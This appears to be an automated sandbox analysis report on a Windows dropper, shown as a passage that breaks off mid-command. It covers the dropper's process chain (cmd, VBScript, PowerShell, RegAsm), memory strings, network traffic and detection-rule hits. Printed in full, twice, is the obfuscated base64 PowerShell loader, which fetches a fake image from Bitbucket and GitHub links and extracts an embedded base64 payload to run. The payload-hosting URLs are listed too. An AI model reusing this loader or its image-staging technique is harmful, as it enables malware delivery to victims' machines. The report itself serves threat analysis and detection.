        Source: qmgr.db.10.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
        Source: qmgr.db.10.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
        Source: qmgr.db.10.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
        Source: qmgr.db.10.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
        Source: qmgr.db.10.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
        Source: qmgr.db.10.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
        Source: qmgr.db.10.dr | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
        Source: powershell.exe, 00000008.00000002.2514235788.0000019449F9E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000008.00000002.2340710949.000001943A15A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000008.00000002.2340710949.000001943E12B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
        Source: powershell.exe, 00000006.00000002.2635327490.00000188234E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.0000019439F31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000008.00000002.2340710949.000001943E12B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
        Source: powershell.exe, 00000008.00000002.2340710949.000001943A15A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000006.00000002.2635327490.00000188234FD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6
        Source: powershell.exe, 00000006.00000002.2635327490.0000018823550000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.0000019439F31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 00000008.00000002.2340710949.000001943E12B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.000001943EC6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.000001943F7BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.000001943F4D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.000001943F794000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
        Source: powershell.exe, 00000008.00000002.2340710949.000001943EC6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.000001943F7BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.000001943F794000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
        Source: powershell.exe, 00000008.00000002.2340710949.000001943A328000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.000001943A15A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aui-cdn.atlassian.com/
        Source: powershell.exe, 00000008.00000002.2340710949.000001943A15A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
        Source: powershell.exe, 00000008.00000002.2340710949.000001943A15A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;
        Source: powershell.exe, 00000008.00000002.2340710949.000001943DEED000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbuseruploads.s3.amazonaws.com
        Source: powershell.exe, 00000008.00000002.2340710949.000001943DEED000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/4be491a4-012e-46db-bc28-27fee082b0f0/downloads/74ccc5a3-8670-
        Source: powershell.exe, 00000008.00000002.2340710949.000001943DEED000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org
        Source: powershell.exe, 00000006.00000002.2635327490.0000018823A7D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2338162714.0000019438316000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2338796491.00000194384F4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.000001943E611000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.0000019439F31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2339496899.0000019439D60000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2338162714.0000019438290000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2338162714.00000194382A5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.000001943A15A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735
        Source: powershell.exe, 00000008.00000002.2340710949.000001943DEED000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/rulmerurk/ertertqw/downloads/po06.txt
        Source: powershell.exe, 00000008.00000002.2340710949.000001943A328000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.000001943A15A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.cookielaw.org/
        Source: powershell.exe, 00000008.00000002.2514235788.0000019449F9E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000008.00000002.2514235788.0000019449F9E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000008.00000002.2514235788.0000019449F9E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
        Source: powershell.exe, 00000008.00000002.2340710949.000001943A328000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.000001943A15A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
        Source: qmgr.db.10.dr | String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
        Source: svchost.exe, 0000000A.00000003.2293868995.0000025084720000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
        Source: powershell.exe, 00000008.00000002.2340710949.000001943A15A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000008.00000002.2340710949.000001943EC6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.000001943FB37000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
        Source: powershell.exe, 00000008.00000002.2514235788.0000019449F9E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
        Source: powershell.exe, 00000008.00000002.2340710949.000001943A15A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com
        Source: powershell.exe, 00000006.00000002.2635327490.0000018823A7D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2668705652.000001883BA0A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2338162714.0000019438316000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2338796491.00000194384F4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.000001943E611000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.0000019439F31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2339496899.0000019439D60000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2338162714.0000019438290000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2338162714.00000194382A5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.000001943A15A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723
        Source: powershell.exe, 00000008.00000002.2340710949.000001943A328000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.000001943A15A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
        Source: powershell.exe, 00000008.00000002.2340710949.000001943A328000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.000001943A15A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
        Source: powershell.exe, 00000008.00000002.2340710949.000001943A328000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.000001943A15A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49752
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49760
        Source: unknown | Network traffic detected: HTTP traffic on port 49725 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49760 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49752 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49725
        Source: unknown | HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.6:49725 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.6:49752 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 16.182.70.97:443 -> 192.168.2.6:49760 version: TLS 1.2

        Spam, unwanted Advertisements and Ransom Demands

        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

        System Summary

        Source: Process Memory Space: powershell.exe PID: 1776, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 5664, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Network Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{093FF999-1EA0-4079-9525-9614C3504B74}
        Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gc#Z#Bm#GY#ZgBm#GY#ZgBm#GY#LwBk#GQ#Z#Bk#GQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#Gk#bQBn#F8#d#Bl#HM#d##u#Go#c#Bn#D8#MQ#x#Dg#MQ#x#Dc#Mw#1#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HI#YQB3#C4#ZwBp#HQ#a#B1#GI#dQBz#GU#cgBj#G8#bgB0#GU#bgB0#C4#YwBv#G0#LwBz#GE#bgB0#G8#bQBh#Gw#bw#v#GE#dQBk#Gk#d##v#G0#YQBp#G4#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#N##0#DQ#MQ#3#DI#Mw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#G
s#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exe | Code function: 0_2_00007FF6975A2C54 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exe | Code function: 0_2_00007FF6975A1C0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx
        Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exe | Code function: 0_2_00007FF6975A6CA4
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exe | Code function: 0_2_00007FF6975A2DB4
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exe | Code function: 0_2_00007FF6975A5D90
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exe | Code function: 0_2_00007FF6975A1D28
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exe | Code function: 0_2_00007FF6975A66C4
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exe | Code function: 0_2_00007FF6975A40C4
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exe | Code function: 0_2_00007FF6975A3530
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exe | Code function: 0_2_00007FF6975A1C0C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_028D0F40
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process token adjusted: Security
        Source: OTO2wVGgkl.exe | Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 6976 bytes, 1 file, at 0x2c +A "123.vbs", ID 527, number 1, 1 datablock, 0x1503 compression
        Source: OTO2wVGgkl.exe | Static PE information: Resource name: RT_RCDATA type: GLS_BINARY_LSB_FIRST
        Source: OTO2wVGgkl.exe | Binary or memory string: OriginalFilename vs OTO2wVGgkl.exe
        Source: OTO2wVGgkl.exe, 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs OTO2wVGgkl.exe
        Source: OTO2wVGgkl.exe | Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs OTO2wVGgkl.exe
        Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 4476
        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4476Jump to behavior
        Source: Process Memory Space: powershell.exe PID: 1776, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: powershell.exe PID: 5664, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: 8.2.powershell.exe.1944a15c978.1.raw.unpack, SimpleZip.csCryptographic APIs: 'CreateDecryptor'
        Source: 8.2.powershell.exe.1944a15c978.1.raw.unpack, SimpleZip.csCryptographic APIs: 'TransformFinalBlock'
        Source: 8.2.powershell.exe.1944a15c978.1.raw.unpack, SimpleZip.csCryptographic APIs: 'TransformFinalBlock'
        Source: 8.2.powershell.exe.19439ca0000.0.raw.unpack, SimpleZip.csCryptographic APIs: 'CreateDecryptor'
        Source: 8.2.powershell.exe.19439ca0000.0.raw.unpack, SimpleZip.csCryptographic APIs: 'TransformFinalBlock'
        Source: 8.2.powershell.exe.19439ca0000.0.raw.unpack, SimpleZip.csCryptographic APIs: 'TransformFinalBlock'
        Source: classification engineClassification label: mal100.spre.expl.evad.winEXE@15/13@4/4
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeCode function: 0_2_00007FF6975A6CA4 GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_00007FF6975A6CA4
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeCode function: 0_2_00007FF6975A1C0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,0_2_00007FF6975A1C0C
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeCode function: 0_2_00007FF6975A6CA4 GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_00007FF6975A6CA4
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeCode function: 0_2_00007FF6975A2DB4 memset,memset,CreateEventA,SetEvent,CreateMutexA,GetLastError,CloseHandle,FindResourceExA,LoadResource,#17,0_2_00007FF6975A2DB4
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.logJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6260:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1404:120:WilError_03
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMPJump to behavior
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c 123.vbs
        Source: OTO2wVGgkl.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
        Source: C:\Windows\System32\cmd.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: OTO2wVGgkl.exeVirustotal: Detection: 21%
        Source: unknownProcess created: C:\Users\user\Desktop\OTO2wVGgkl.exe "C:\Users\user\Desktop\OTO2wVGgkl.exe"
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c 123.vbs
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\123.vbs"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gc#Z#Bm#GY#ZgBm#GY#ZgBm#GY#LwBk#GQ#Z#Bk#GQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#Gk#bQBn#F8#d#Bl#HM#d##u#Go#c#Bn#D8#MQ#x#Dg#MQ#x#Dc#Mw#1#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HI#YQB3#C4#ZwBp#HQ#a#B1#GI#dQBz#GU#cgBj#G8#bgB0#GU#bgB0#C4#YwBv#G0#LwBz#GE#bgB0#G8#bQBh#Gw#bw#v#GE#dQBk#Gk#d##v#G0#YQBp#G4#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#N##0#DQ#MQ#3#DI#Mw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#G
